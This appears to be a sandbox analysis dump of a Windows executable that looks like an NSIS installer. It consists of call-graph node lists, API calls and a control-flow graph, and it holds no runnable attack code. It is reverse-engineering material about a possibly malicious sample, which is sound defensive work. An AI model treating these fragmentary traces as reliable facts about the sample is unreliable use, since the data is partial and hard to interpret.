5347 406bbb 5348->5347 5348->5348 5349 4062d1 GlobalFree 5348->5349 5350 4062da GlobalAlloc 5348->5350 5351 406351 GlobalAlloc 5348->5351 5352 406348 GlobalFree 5348->5352 5349->5350 5350->5347 5350->5348 5351->5347 5351->5348 5352->5351 5353 10002a43 5354 10002a5b 5353->5354 5355 100015a7 2 API calls 5354->5355 5356 10002a76 5355->5356 5357 401f08 5358 402b3a 18 API calls 5357->5358 5359 401f0f GetFileVersionInfoSizeW 5358->5359 5360 401f36 GlobalAlloc 5359->5360 5362 401f8c 5359->5362 5361 401f4a GetFileVersionInfoW 5360->5361 5360->5362 5361->5362 5363 401f59 VerQueryValueW 5361->5363 5363->5362 5364 401f72 5363->5364 5368 405cbe wsprintfW 5364->5368 5366 401f7e 5369 405cbe wsprintfW 5366->5369 5368->5366 5369->5362 5377 40410a lstrlenW 5378 404129 5377->5378 5379 40412b WideCharToMultiByte 5377->5379 5378->5379 5380 1000224c 5381 100022b1 5380->5381 5382 100022e7 5380->5382 5381->5382 5383 100022c3 GlobalAlloc 5381->5383 5383->5381 5384 100016ce 5385 100016fd 5384->5385 5386 10001b3e 24 API calls 5385->5386 5387 10001704 5386->5387 5388 10001717 5387->5388 5389 1000170b 5387->5389 5390 10001721 5388->5390 5391 1000173e 5388->5391 5392 10001280 2 API calls 5389->5392 5394 10001555 3 API calls 5390->5394 5395 10001744 5391->5395 5396 10001768 5391->5396 5393 10001715 5392->5393 5398 10001726 5394->5398 5399 100015cc 3 API calls 5395->5399 5397 10001555 3 API calls 5396->5397 5397->5393 5400 100015cc 3 API calls 5398->5400 5401 10001749 5399->5401 5402 1000172c 5400->5402 5403 10001280 2 API calls 5401->5403 5404 10001280 2 API calls 5402->5404 5405 1000174f GlobalFree 5403->5405 5406 10001732 GlobalFree 5404->5406 5405->5393 5407 10001763 GlobalFree 5405->5407 5406->5393 5407->5393 5408 401c8e 5409 402b1d 18 API calls 5408->5409 5410 401c94 IsWindow 5409->5410 5411 4019f0 5410->5411 5412 404410 5413 404420 5412->5413 5414 404446 5412->5414 5415 403fbc 19 API calls 5413->5415 5416 404023 8 API calls 5414->5416 5417 40442d SetDlgItemTextW 5415->5417 5418 404452 5416->5418 5417->5414 5419 401491 5420 405021 25 API calls 5419->5420 5421 401498 5420->5421 5422 402295 5423 402b3a 18 API calls 5422->5423 5424 4022a4 5423->5424 5425 402b3a 18 API calls 5424->5425 5426 4022ad 5425->5426 5427 402b3a 18 API calls 5426->5427 5428 4022b7 GetPrivateProfileStringW 5427->5428 5429 404f95 5430 404fa5 5429->5430 5431 404fb9 5429->5431 5432 405002 5430->5432 5433 404fab 5430->5433 5434 404fc1 IsWindowVisible 5431->5434 5440 404fd8 5431->5440 5435 405007 CallWindowProcW 5432->5435 5436 404008 SendMessageW 5433->5436 5434->5432 5437 404fce 5434->5437 5438 404fb5 5435->5438 5436->5438 5442 4048eb SendMessageW 5437->5442 5440->5435 5447 40496b 5440->5447 5443 40494a SendMessageW 5442->5443 5444 40490e GetMessagePos ScreenToClient SendMessageW 5442->5444 5445 404942 5443->5445 5444->5445 5446 404947 5444->5446 5445->5440 5446->5443 5456 405d77 lstrcpynW 5447->5456 5449 40497e 5457 405cbe wsprintfW 5449->5457 5451 404988 5452 40140b 2 API calls 5451->5452 5453 404991 5452->5453 5458 405d77 lstrcpynW 5453->5458 5455 404998 5455->5432 5456->5449 5457->5451 5458->5455 4538 401f98 4539 401faa 4538->4539 4549 40205c 4538->4549 4540 402b3a 18 API calls 4539->4540 4542 401fb1 4540->4542 4541 401423 25 API calls 4547 402197 4541->4547 4543 402b3a 18 API calls 4542->4543 4544 401fba 4543->4544 4545 401fd0 LoadLibraryExW 4544->4545 4546 401fc2 GetModuleHandleW 4544->4546 4548 401fe1 4545->4548 4545->4549 4546->4545 4546->4548 4561 40614d WideCharToMultiByte 4548->4561 4549->4541 4552 401ff2 4555 402011 4552->4555 4556 401ffa 4552->4556 4553 40202b 4554 405021 25 API calls 4553->4554 4557 402002 4554->4557 4564 10001771 4555->4564 4558 401423 25 API calls 4556->4558 4557->4547 4559 40204e FreeLibrary 4557->4559 4558->4557 4559->4547 4562 406177 GetProcAddress 4561->4562 4563 401fec 4561->4563 4562->4563 4563->4552 4563->4553 4565 100017a1 4564->4565 4606 10001b3e 4565->4606 4567 100017a8 4568 100018be 4567->4568 4569 100017c0 4567->4569 4570 100017b9 4567->4570 4568->4557 4640 100022eb 4569->4640 4658 100022a1 4570->4658 4575 10001824 4581 10001866 4575->4581 4582 1000182a 4575->4582 4576 10001806 4671 1000248d 4576->4671 4577 100017d6 4580 100017dc 4577->4580 4587 100017e7 4577->4587 4578 100017ef 4592 100017e5 4578->4592 4668 10002b23 4578->4668 4580->4592 4652 10002868 4580->4652 4585 1000248d 10 API calls 4581->4585 4583 100015cc 3 API calls 4582->4583 4589 10001840 4583->4589 4590 10001858 4585->4590 4662 1000260b 4587->4662 4595 1000248d 10 API calls 4589->4595 4605 100018ad 4590->4605 4694 10002450 4590->4694 4592->4575 4592->4576 4594 100017ed 4594->4592 4595->4590 4598 100018b7 GlobalFree 4598->4568 4602 10001899 4602->4605 4698 10001555 wsprintfW 4602->4698 4604 10001892 FreeLibrary 4604->4602 4605->4568 4605->4598 4701 1000121b GlobalAlloc 4606->4701 4608 10001b62 4702 1000121b GlobalAlloc 4608->4702 4610 10001b6d 4703 10001243 4610->4703 4612 10001da0 GlobalFree GlobalFree GlobalFree 4613 10001dbd 4612->4613 4622 10001e07 4612->4622 4615 1000210d 4613->4615 4613->4622 4625 10001dd2 4613->4625 4614 10001b75 4614->4612 4616 10001c43 GlobalAlloc 4614->4616 4618 10001c8e lstrcpyW 4614->4618 4619 10001cac GlobalFree 4614->4619 4614->4622 4623 10001c98 lstrcpyW 4614->4623 4626 10002067 4614->4626 4635 10001cea 4614->4635 4636 10001f56 GlobalFree 4614->4636 4637 1000122c 2 API calls 4614->4637 4713 1000121b GlobalAlloc 4614->4713 4617 1000212f GetModuleHandleW 4615->4617 4615->4622 4616->4614 4620 10002140 LoadLibraryW 4617->4620 4621 10002155 4617->4621 4618->4623 4619->4614 4620->4621 4620->4622 4714 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4621->4714 4622->4567 4623->4614 4625->4622 4710 1000122c 4625->4710 4626->4622 4634 100020af lstrcpyW 4626->4634 4627 100021a7 4627->4622 4628 100021b4 lstrlenW 4627->4628 4715 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4628->4715 4632 10002167 4632->4627 4639 10002191 GetProcAddress 4632->4639 4633 100021ce 4633->4622 4634->4622 4635->4614 4708 100015a7 GlobalSize GlobalAlloc 4635->4708 4636->4614 4637->4614 4639->4627 4647 10002303 4640->4647 4641 1000122c GlobalAlloc lstrcpynW 4641->4647 4642 10001243 3 API calls 4642->4647 4644 10002419 GlobalFree 4645 100017c6 4644->4645 4644->4647 4645->4577 4645->4578 4645->4592 4646 100023d5 GlobalAlloc WideCharToMultiByte 4646->4644 4647->4641 4647->4642 4647->4644 4647->4646 4648 100023ae GlobalAlloc 4647->4648 4649 10002390 lstrlenW 4647->4649 4718 100012c8 4647->4718 4650 1000239b 4648->4650 4649->4644 4649->4650 4650->4644 4723 1000259f 4650->4723 4654 1000287a 4652->4654 4653 1000291f VirtualAlloc 4655 1000293d 4653->4655 4654->4653 4656 10002a39 4655->4656 4657 10002a2e GetLastError 4655->4657 4656->4592 4657->4656 4659 100022b1 4658->4659 4660 100017bf 4658->4660 4659->4660 4661 100022c3 GlobalAlloc 4659->4661 4660->4569 4661->4659 4666 10002627 4662->4666 4663 10002678 GlobalAlloc 4667 1000269a 4663->4667 4664 1000268b 4665 10002690 GlobalSize 4664->4665 4664->4667 4665->4667 4666->4663 4666->4664 4667->4594 4669 10002b2e 4668->4669 4670 10002b6e GlobalFree 4669->4670 4675 100024ad 4671->4675 4673 100024db wsprintfW 4673->4675 4674 10002558 GlobalFree 4674->4675 4675->4673 4675->4674 4676 1000250e MultiByteToWideChar 4675->4676 4677 10002581 GlobalFree 4675->4677 4679 100024fd lstrcpynW 4675->4679 4680 100024ec StringFromGUID2 4675->4680 4681 10001280 2 API calls 4675->4681 4726 1000121b GlobalAlloc 4675->4726 4727 100012f3 4675->4727 4676->4675 4677->4675 4678 1000180c 4677->4678 4683 100015cc 4678->4683 4679->4675 4680->4675 4681->4675 4731 1000121b GlobalAlloc 4683->4731 4685 100015d2 4687 100015df lstrcpyW 4685->4687 4688 100015f9 4685->4688 4689 10001613 4687->4689 4688->4689 4690 100015fe wsprintfW 4688->4690 4691 10001280 4689->4691 4690->4689 4692 100012c3 GlobalFree 4691->4692 4693 10001289 GlobalAlloc lstrcpynW 4691->4693 4692->4590 4693->4692 4695 1000245e 4694->4695 4697 10001879 4694->4697 4696 1000247a GlobalFree 4695->4696 4695->4697 4696->4695 4697->4602 4697->4604 4699 10001280 2 API calls 4698->4699 4700 10001576 4699->4700 4700->4605 4701->4608 4702->4610 4704 1000127c 4703->4704 4705 1000124d 4703->4705 4704->4614 4705->4704 4716 1000121b GlobalAlloc 4705->4716 4707 10001259 lstrcpyW GlobalFree 4707->4614 4709 100015c5 4708->4709 4709->4635 4717 1000121b GlobalAlloc 4710->4717 4712 1000123b lstrcpynW 4712->4622 4713->4614 4714->4632 4715->4633 4716->4707 4717->4712 4719 100012d0 4718->4719 4720 100012ee 4718->4720 4719->4720 4721 1000122c 2 API calls 4719->4721 4720->4720 4722 100012ec 4721->4722 4722->4647 4724 10002603 4723->4724 4725 100025ad VirtualAlloc 4723->4725 4724->4650 4725->4724 4726->4675 4728 10001324 4727->4728 4729 100012fc 4727->4729 4728->4675 4729->4728 4730 10001308 lstrcpyW 4729->4730 4730->4728 4731->4685 5459 10001058 5460 10001243 3 API calls 5459->5460 5462 10001074 5460->5462 5461 100010dd 5462->5461 5463 10001092 5462->5463 5464 1000152e 4 API calls 5462->5464 5465 1000152e 4 API calls 5463->5465 5464->5463 5466 100010a2 5465->5466 5467 100010b2 5466->5467 5468 100010a9 GlobalSize 5466->5468 5469 100010b6 GlobalAlloc 5467->5469 5470 100010c7 5467->5470 5468->5467 5471 10001555 3 API calls 5469->5471 5472 100010d2 GlobalFree 5470->5472 5471->5470 5472->5461 5473 401718 5474 402b3a 18 API calls 5473->5474 5475 40171f SearchPathW 5474->5475 5476 40173a 5475->5476 4751 40159b 4752 402b3a 18 API calls 4751->4752 4753 4015a2 SetFileAttributesW 4752->4753 4754 4015b4 4753->4754 5484 40499d GetDlgItem GetDlgItem 5485 4049ef 7 API calls 5484->5485 5491 404c08 5484->5491 5486 404a92 DeleteObject 5485->5486 5487 404a85 SendMessageW 5485->5487 5488 404a9b 5486->5488 5487->5486 5489 404ad2 5488->5489 5490 405d99 18 API calls 5488->5490 5492 403fbc 19 API calls 5489->5492 5494 404ab4 SendMessageW SendMessageW 5490->5494 5497 404cec 5491->5497 5501 4048eb 5 API calls 5491->5501 5517 404c79 5491->5517 5496 404ae6 5492->5496 5493 404d98 5495 404da2 SendMessageW 5493->5495 5500 404daa 5493->5500 5494->5488 5495->5500 5502 403fbc 19 API calls 5496->5502 5497->5493 5503 404d45 SendMessageW 5497->5503 5527 404bfb 5497->5527 5498 404023 8 API calls 5504 404f8e 5498->5504 5499 404cde SendMessageW 5499->5497 5505 404dc3 5500->5505 5506 404dbc ImageList_Destroy 5500->5506 5514 404dd3 5500->5514 5501->5517 5518 404af4 5502->5518 5508 404d5a SendMessageW 5503->5508 5503->5527 5509 404dcc GlobalFree 5505->5509 5505->5514 5506->5505 5507 404f42 5512 404f54 ShowWindow GetDlgItem ShowWindow 5507->5512 5507->5527 5511 404d6d 5508->5511 5509->5514 5510 404bc9 GetWindowLongW SetWindowLongW 5513 404be2 5510->5513 5519 404d7e SendMessageW 5511->5519 5512->5527 5515 404c00 5513->5515 5516 404be8 ShowWindow 5513->5516 5514->5507 5526 40496b 4 API calls 5514->5526 5531 404e0e 5514->5531 5536 403ff1 SendMessageW 5515->5536 5535 403ff1 SendMessageW 5516->5535 5517->5497 5517->5499 5518->5510 5520 404bc3 5518->5520 5523 404b44 SendMessageW 5518->5523 5524 404b80 SendMessageW 5518->5524 5525 404b91 SendMessageW 5518->5525 5519->5493 5520->5510 5520->5513 5523->5518 5524->5518 5525->5518 5526->5531 5527->5498 5528 404f18 InvalidateRect 5528->5507 5529 404f2e 5528->5529 5532 404805 21 API calls 5529->5532 5530 404e3c SendMessageW 5534 404e52 5530->5534 5531->5530 5531->5534 5532->5507 5533 404ec6 SendMessageW SendMessageW 5533->5534 5534->5528 5534->5533 5535->5527 5536->5491 5537 40149e 5538 4014ac PostQuitMessage 5537->5538 5539 40223e 5537->5539 5538->5539 5540 40479f 5541 4047cb 5540->5541 5542 4047af 5540->5542 5543 4047d1 SHGetPathFromIDListW 5541->5543 5544 4047fe 5541->5544 5551 405537 GetDlgItemTextW 5542->5551 5546 4047e1 5543->5546 5547 4047e8 SendMessageW 5543->5547 5549 40140b 2 API calls 5546->5549 5547->5544 5548 4047bc SendMessageW 5548->5541 5549->5547 5551->5548 5552 4021a0 5553 402b3a 18 API calls 5552->5553 5554 4021a6 5553->5554 5555 402b3a 18 API calls 5554->5555 5556 4021af 5555->5556 5557 402b3a 18 API calls 5556->5557 5558 4021b8 5557->5558 5559 4060ba 2 API calls 5558->5559 5560 4021c1 5559->5560 5561 4021d2 lstrlenW lstrlenW 5560->5561 5562 4021c5 5560->5562 5564 405021 25 API calls 5561->5564 5563 405021 25 API calls 5562->5563 5565 4021cd 5562->5565 5563->5565 5566 402210 SHFileOperationW 5564->5566 5566->5562 5566->5565 5567 100010e1 5568 10001111 5567->5568 5569 10001243 3 API calls 5568->5569 5572 10001121 5569->5572 5570 100011d8 GlobalFree 5571 100012c8 2 API calls 5571->5572 5572->5570 5572->5571 5573 100011d3 5572->5573 5574 10001243 3 API calls 5572->5574 5575 10001280 2 API calls 5572->5575 5576 10001164 GlobalAlloc 5572->5576 5577 100011f8 GlobalFree 5572->5577 5578 100011c4 GlobalFree 5572->5578 5579 100012f3 lstrcpyW 5572->5579 5573->5570 5574->5572 5575->5578 5576->5572 5577->5572 5578->5572 5579->5572 4078 401b22 4079 401b73 4078->4079 4080 401b2f 4078->4080 4081 401b78 4079->4081 4082 401b9d GlobalAlloc 4079->4082 4083 401bb8 4080->4083 4086 401b46 4080->4086 4093 40223e 4081->4093 4099 405d77 lstrcpynW 4081->4099 4084 405d99 18 API calls 4082->4084 4085 405d99 18 API calls 4083->4085 4083->4093 4084->4083 4088 402238 4085->4088 4097 405d77 lstrcpynW 4086->4097 4100 405553 4088->4100 4090 401b8a GlobalFree 4090->4093 4092 401b55 4098 405d77 lstrcpynW 4092->4098 4095 401b64 4104 405d77 lstrcpynW 4095->4104 4097->4092 4098->4095 4099->4090 4101 405568 4100->4101 4102 4055b4 4101->4102 4103 40557c MessageBoxIndirectW 4101->4103 4102->4093 4103->4102 4104->4093 5580 4029a2 SendMessageW 5581 4029c7 5580->5581 5582 4029bc InvalidateRect 5580->5582 5582->5581 4105 401924 4106 401926 4105->4106 4107 402b3a 18 API calls 4106->4107 4108 40192b 4107->4108 4111 4055ff 4108->4111 4150 4058ca 4111->4150 4114 405627 DeleteFileW 4116 401934 4114->4116 4115 40563e 4118 40575e 4115->4118 4164 405d77 lstrcpynW 4115->4164 4118->4116 4183 4060ba FindFirstFileW 4118->4183 4119 405664 4120 405677 4119->4120 4121 40566a lstrcatW 4119->4121 4165 40580e lstrlenW 4120->4165 4122 40567d 4121->4122 4125 40568d lstrcatW 4122->4125 4127 405698 lstrlenW FindFirstFileW 4122->4127 4125->4127 4127->4118 4134 4056ba 4127->4134 4128 405787 4186 4057c2 lstrlenW CharPrevW 4128->4186 4131 405741 FindNextFileW 4131->4134 4135 405757 FindClose 4131->4135 4132 4055b7 5 API calls 4136 405799 4132->4136 4134->4131 4148 405702 4134->4148 4169 405d77 lstrcpynW 4134->4169 4135->4118 4137 4057b3 4136->4137 4138 40579d 4136->4138 4140 405021 25 API calls 4137->4140 4138->4116 4141 405021 25 API calls 4138->4141 4140->4116 4143 4057aa 4141->4143 4142 4055ff 64 API calls 4142->4148 4145 405c11 40 API calls 4143->4145 4144 405021 25 API calls 4144->4131 4146 4057b1 4145->4146 4146->4116 4147 405021 25 API calls 4147->4148 4148->4131 4148->4142 4148->4144 4148->4147 4170 4055b7 4148->4170 4178 405c11 4148->4178 4189 405d77 lstrcpynW 4150->4189 4152 4058db 4190 40586d CharNextW CharNextW 4152->4190 4155 40561f 4155->4114 4155->4115 4156 40600b 5 API calls 4162 4058f1 4156->4162 4157 405922 lstrlenW 4158 40592d 4157->4158 4157->4162 4160 4057c2 3 API calls 4158->4160 4159 4060ba 2 API calls 4159->4162 4161 405932 GetFileAttributesW 4160->4161 4161->4155 4162->4155 4162->4157 4162->4159 4163 40580e 2 API calls 4162->4163 4163->4157 4164->4119 4166 40581c 4165->4166 4167 405822 CharPrevW 4166->4167 4168 40582e 4166->4168 4167->4166 4167->4168 4168->4122 4169->4134 4196 4059be GetFileAttributesW 4170->4196 4173 4055e4 4173->4148 4174 4055d2 RemoveDirectoryW 4176 4055e0 4174->4176 4175 4055da DeleteFileW 4175->4176 4176->4173 4177 4055f0 SetFileAttributesW 4176->4177 4177->4173 4199 4060e1 GetModuleHandleA 4178->4199 4182 405c39 4182->4148 4184 4060d0 FindClose 4183->4184 4185 405783 4183->4185 4184->4185 4185->4116 4185->4128 4187 40578d 4186->4187 4188 4057de lstrcatW 4186->4188 4187->4132 4188->4187 4189->4152 4191 40588a 4190->4191 4192 40589c 4190->4192 4191->4192 4193 405897 CharNextW 4191->4193 4194 4057ef CharNextW 4192->4194 4195 4058c0 4192->4195 4193->4195 4194->4192 4195->4155 4195->4156 4197 4059d0 SetFileAttributesW 4196->4197 4198 4055c3 4196->4198 4197->4198 4198->4173 4198->4174 4198->4175 4200 406108 GetProcAddress 4199->4200 4201 4060fd LoadLibraryA 4199->4201 4202 405c18 4200->4202 4201->4200 4201->4202 4202->4182 4203 405a95 lstrcpyW 4202->4203 4204 405ae4 GetShortPathNameW 4203->4204 4205 405abe 4203->4205 4207 405af9 4204->4207 4208 405c0b 4204->4208 4228 4059e3 GetFileAttributesW CreateFileW 4205->4228 4207->4208 4210 405b01 wsprintfA 4207->4210 4208->4182 4209 405ac8 CloseHandle GetShortPathNameW 4209->4208 4211 405adc 4209->4211 4212 405d99 18 API calls 4210->4212 4211->4204 4211->4208 4213 405b29 4212->4213 4229 4059e3 GetFileAttributesW CreateFileW 4213->4229 4215 405b36 4215->4208 4216 405b45 GetFileSize GlobalAlloc 4215->4216 4217 405c04 CloseHandle 4216->4217 4218 405b67 4216->4218 4217->4208 4230 405a66 ReadFile 4218->4230 4223 405b86 lstrcpyA 4226 405ba8 4223->4226 4224 405b9a 4225 405948 4 API calls 4224->4225 4225->4226 4227 405bdf SetFilePointer WriteFile GlobalFree 4226->4227 4227->4217 4228->4209 4229->4215 4231 405a84 4230->4231 4231->4217 4232 405948 lstrlenA 4231->4232 4233 405989 lstrlenA 4232->4233 4234 405991 4233->4234 4235 405962 lstrcmpiA 4233->4235 4234->4223 4234->4224 4235->4234 4236 405980 CharNextA 4235->4236 4236->4233 5583 402224 5584 40223e 5583->5584 5585 40222b 5583->5585 5586 405d99 18 API calls 5585->5586 5587 402238 5586->5587 5588 405553 MessageBoxIndirectW 5587->5588 5588->5584 5589 10001667 5590 1000152e 4 API calls 5589->5590 5593 1000167f 5590->5593 5591 100016c5 GlobalFree 5592 1000169a 5592->5591 5593->5591 5593->5592 5594 100016b1 VirtualFree 5593->5594 5594->5591 5595 402729 5596 402730 5595->5596 5597 4029c7 5595->5597 5598 402736 FindClose 5596->5598 5598->5597 5599 401cab 5600 402b1d 18 API calls 5599->5600 5601 401cb2 5600->5601 5602 402b1d 18 API calls 5601->5602 5603 401cba GetDlgItem 5602->5603 5604 4024e8 5603->5604 5605 4016af 5606 402b3a 18 API calls 5605->5606 5607 4016b5 GetFullPathNameW 5606->5607 5608 4016cf 5607->5608 5614 4016f1 5607->5614 5611 4060ba 2 API calls 5608->5611 5608->5614 5609 401706 GetShortPathNameW 5610 4029c7 5609->5610 5612 4016e1 5611->5612 5612->5614 5615 405d77 lstrcpynW 5612->5615 5614->5609 5614->5610 5615->5614 4383 402331 4384 402337 4383->4384 4385 402b3a 18 API calls 4384->4385 4386 402349 4385->4386 4387 402b3a 18 API calls 4386->4387 4388 402353 RegCreateKeyExW 4387->4388 4389 40237d 4388->4389 4392 402793 4388->4392 4390 402398 4389->4390 4393 402b3a 18 API calls 4389->4393 4391 4023a4 4390->4391 4394 402b1d 18 API calls 4390->4394 4395 4023bf RegSetValueExW 4391->4395 4400 402fa2 4391->4400 4396 40238e lstrlenW 4393->4396 4394->4391 4398 4023d5 RegCloseKey 4395->4398 4396->4390 4398->4392 4401 402fbb 4400->4401 4402 402fe6 4401->4402 4432 4031b4 SetFilePointer 4401->4432 4422 40319e 4402->4422 4406 403132 4408 403136 4406->4408 4413 40314e 4406->4413 4407 403003 GetTickCount 4419 403016 4407->4419 4410 40319e ReadFile 4408->4410 4409 40311d 4409->4395 4410->4409 4411 40319e ReadFile 4411->4413 4412 40319e ReadFile 4412->4419 4413->4409 4413->4411 4414 403169 WriteFile 4413->4414 4414->4409 4415 40317e 4414->4415 4415->4409 4415->4413 4417 40307c GetTickCount 4417->4419 4418 4030a5 MulDiv wsprintfW 4420 405021 25 API calls 4418->4420 4419->4409 4419->4412 4419->4417 4419->4418 4421 4030e9 WriteFile 4419->4421 4425 40621d 4419->4425 4420->4419 4421->4409 4421->4419 4423 405a66 ReadFile 4422->4423 4424 402ff1 4423->4424 4424->4406 4424->4407 4424->4409 4426 406242 4425->4426 4427 40624a 4425->4427 4426->4419 4427->4426 4428 4062d1 GlobalFree 4427->4428 4429 4062da GlobalAlloc 4427->4429 4430 406351 GlobalAlloc 4427->4430 4431 406348 GlobalFree 4427->4431 4428->4429 4429->4426 4429->4427 4430->4426 4430->4427 4431->4430 4432->4402 5623 4027b5 5624 402b3a 18 API calls 5623->5624 5625 4027c3 5624->5625 5626 4027d9 5625->5626 5627 402b3a 18 API calls 5625->5627 5628 4059be 2 API calls 5626->5628 5627->5626 5629 4027df 5628->5629 5649 4059e3 GetFileAttributesW CreateFileW 5629->5649 5631 4027ec 5632 402895 5631->5632 5633 4027f8 GlobalAlloc 5631->5633 5636 4028b0 5632->5636 5637 40289d DeleteFileW 5632->5637 5634 402811 5633->5634 5635 40288c CloseHandle 5633->5635 5650 4031b4 SetFilePointer 5634->5650 5635->5632 5637->5636 5639 402817 5640 40319e ReadFile 5639->5640 5641 402820 GlobalAlloc 5640->5641 5642 402830 5641->5642 5643 402864 WriteFile GlobalFree 5641->5643 5645 402fa2 37 API calls 5642->5645 5644 402fa2 37 API calls 5643->5644 5646 402889 5644->5646 5647 40283d 5645->5647 5646->5635 5648 40285b GlobalFree 5647->5648 5648->5643 5649->5631 5650->5639 5651 4028b6 5652 402b1d 18 API calls 5651->5652 5653 4028bc 5652->5653 5654 4028f8 5653->5654 5655 4028df 5653->5655 5661 402793 5653->5661 5656 402902 5654->5656 5657 40290e 5654->5657 5658 4028e4 5655->5658 5664 4028f5 5655->5664 5659 402b1d 18 API calls 5656->5659 5660 405d99 18 API calls 5657->5660 5665 405d77 lstrcpynW 5658->5665 5659->5664 5660->5664 5664->5661 5666 405cbe wsprintfW 5664->5666 5665->5661 5666->5661 5667 4014b8 5668 4014be 5667->5668 5669 401389 2 API calls 5668->5669 5670 4014c6 5669->5670 4732 4015b9 4733 402b3a 18 API calls 4732->4733 4734 4015c0 4733->4734 4735 40586d 4 API calls 4734->4735 4744 4015c9 4735->4744 4736 401614 4737 401646 4736->4737 4738 401619 4736->4738 4743 401423 25 API calls 4737->4743 4740 401423 25 API calls 4738->4740 4739 4057ef CharNextW 4741 4015d7 CreateDirectoryW 4739->4741 4742 401620 4740->4742 4741->4744 4745 4015ed GetLastError 4741->4745 4750 405d77 lstrcpynW 4742->4750 4749 40163e 4743->4749 4744->4736 4744->4739 4745->4744 4747 4015fa GetFileAttributesW 4745->4747 4747->4744 4748 40162d SetCurrentDirectoryW 4748->4749 4750->4748 5671 401939 5672 402b3a 18 API calls 5671->5672 5673 401940 lstrlenW 5672->5673 5674 4024e8 5673->5674 5675 40293b 5676 402b1d 18 API calls 5675->5676 5677 402941 5676->5677 5678 402974 5677->5678 5679 402793 5677->5679 5681 40294f 5677->5681 5678->5679 5680 405d99 18 API calls 5678->5680 5680->5679 5681->5679 5683 405cbe wsprintfW 5681->5683 5683->5679 4769 40173f 4770 402b3a 18 API calls 4769->4770 4771 401746 4770->4771 4775 405a12 4771->4775 4773 40174d 4774 405a12 2 API calls 4773->4774 4774->4773 4776 405a1f GetTickCount GetTempFileNameW 4775->4776 4777 405a59 4776->4777 4778 405a55 4776->4778 4777->4773 4778->4776 4778->4777

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4031ff-403295 #17 SetErrorMode OleInitialize call 4060e1 SHGetFileInfoW call 405d77 GetCommandLineW call 405d77 GetModuleHandleW 7 403297-40329e 0->7 8 40329f-4032b1 call 4057ef CharNextW 0->8 7->8 11 40337f-403385 8->11 12 4032b6-4032bc 11->12 13 40338b 11->13 15 4032c5-4032cb 12->15 16 4032be-4032c3 12->16 14 40339f-4033b9 GetTempPathW call 4031cb 13->14 25 403411-40342b DeleteFileW call 402d69 14->25 26 4033bb-4033d9 GetWindowsDirectoryW lstrcatW call 4031cb 14->26 17 4032d2-4032d6 15->17 18 4032cd-4032d1 15->18 16->15 16->16 20 403370-40337b call 4057ef 17->20 21 4032dc-4032e2 17->21 18->17 20->11 36 40337d-40337e 20->36 23 4032e4-4032eb 21->23 24 4032fc-403313 21->24 28 4032f2 23->28 29 4032ed-4032f0 23->29 30 403341-403357 24->30 31 403315-40332b 24->31 40 4034c1-4034d0 call 403667 OleUninitialize 25->40 41 403431-403437 25->41 26->25 44 4033db-40340b GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031cb 26->44 28->24 29->24 29->28 30->20 39 403359-40336e 30->39 31->30 37 40332d-403335 31->37 36->11 42 403337-40333a 37->42 43 40333c 37->43 39->20 45 40338d-40339a call 405d77 39->45 57 4034d6-4034e6 call 405553 ExitProcess 40->57 58 4035cc-4035d2 40->58 46 4034b1-4034b8 call 403741 41->46 47 403439-403444 call 4057ef 41->47 42->30 42->43 43->30 44->25 44->40 45->14 55 4034bd 46->55 61 403446-403457 47->61 62 40347b-403485 47->62 55->40 59 4035d4-4035f1 call 4060e1 * 3 58->59 60 40364f-403657 58->60 92 4035f3-4035f5 59->92 93 40363b-403646 ExitWindowsEx 59->93 66 403659 60->66 67 40365d-403661 ExitProcess 60->67 65 403459-40345b 61->65 68 403487-403495 call 4058ca 62->68 69 4034ec-403506 lstrcatW lstrcmpiW 62->69 72 403475-403479 65->72 73 40345d-403473 65->73 66->67 68->40 82 403497-4034ad call 405d77 * 2 68->82 69->40 75 403508-40351e CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->65 73->62 73->72 78 403520-403526 call 405d77 75->78 79 40352b-403554 call 405d77 75->79 78->79 87 403559-403575 call 405d99 DeleteFileW 79->87 82->46 98 4035b6-4035be 87->98 99 403577-403587 CopyFileW 87->99 92->93 97 4035f7-4035f9 92->97 93->60 96 403648-40364a call 40140b 93->96 96->60 97->93 101 4035fb-40360d GetCurrentProcess 97->101 98->87 103 4035c0-4035c7 call 405c11 98->103 99->98 102 403589-4035a9 call 405c11 call 405d99 call 4054f2 99->102 101->93 109 40360f-403631 101->109 102->98 115 4035ab-4035b2 CloseHandle 102->115 103->40 109->93 115->98
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 0040321E
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403229
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403230
                                                                                                • Part of subcall function 004060E1: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000008), ref: 004060F3
                                                                                                • Part of subcall function 004060E1: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000008), ref: 004060FE
                                                                                                • Part of subcall function 004060E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040610F
                                                                                              • SHGetFileInfoW.SHELL32(00420658,00000000,?,000002B4,00000000), ref: 00403258
                                                                                                • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                              • GetCommandLineW.KERNEL32(004281A0,NSIS Error), ref: 0040326D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rFa24c148.exe",00000000), ref: 00403280
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rFa24c148.exe",00000020), ref: 004032A7
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033B0
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033C1
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033CD
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033E1
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033E9
